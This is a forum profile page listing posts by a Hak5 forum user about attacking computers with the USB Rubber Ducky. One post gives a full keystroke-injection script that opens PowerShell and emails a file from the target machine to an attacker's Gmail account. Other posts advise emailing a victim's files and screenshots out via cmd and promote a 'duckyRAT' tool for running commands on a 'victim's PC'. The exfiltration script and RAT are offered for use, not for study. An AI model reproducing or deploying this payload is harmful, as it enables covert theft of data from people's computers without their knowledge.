Jump to content

untitled

Active Members
  • Posts

    13
  • Joined

  • Last visited

Everything posted by untitled

  1. Look up cmd commands to send files as email attatchments to you and take screenshots with cmd then email the files Its not too hard, just not as easy as a normal RAT software
  2. Here's what I do, just a few Powershell commands: STRING powershell ENTER DELAY 500 STRING $EmailTo = "EMAILTO@gmail.com" ENTER DELAY 50 STRING $EmailFrom = "EMAILFROM@gmail.com" ENTER DELAY 50 STRING $Subject = "EMAILSUBJECT" ENTER DELAY 50 STRING $Body = "EMAILBODY" ENTER DELAY 50 STRING $SMTPServer = "smtp.gmail.com" ENTER DELAY 50 STRING $filenameAndPath = "ATTATCHMENT.txt" ENTER DELAY 50 STRING $SMTPMessage = New-Object System.Net.Mail.MailMessage($EmailFrom,$EmailTo,$Subject,$Body) ENTER DELAY 50 STRING $attachment = New-Object System.Net.Mail.Attachment($filenameAndPath) ENTER DELAY 50 STRING $SMTPMessage.Attachments.Add($attachment) ENTER DELAY 50 STRING $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER DELAY 50 STRING $SMTPClient.EnableSsl = $true ENTER DELAY 50 STRING $SMTPClient.Credentials = New-Object System.Net.NetworkCredential("YOUREMAIL@gmail.com", "YOUR EMAIL PASSWORD OR 14 DIGIT AUTH CODE"); ENTER DELAY 50 STRING $SMTPClient.Send($SMTPMessage) ENTER DELAY 2000 STRING exit ENTER
  3. That's actually pretty interesting, I might use this in the future. Thanks!
  4. It should be working fine, mine worked fine when I originally got it, try making the delay a bit longer and just fiddle around with it until it works.
  5. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
×
×
  • Create New...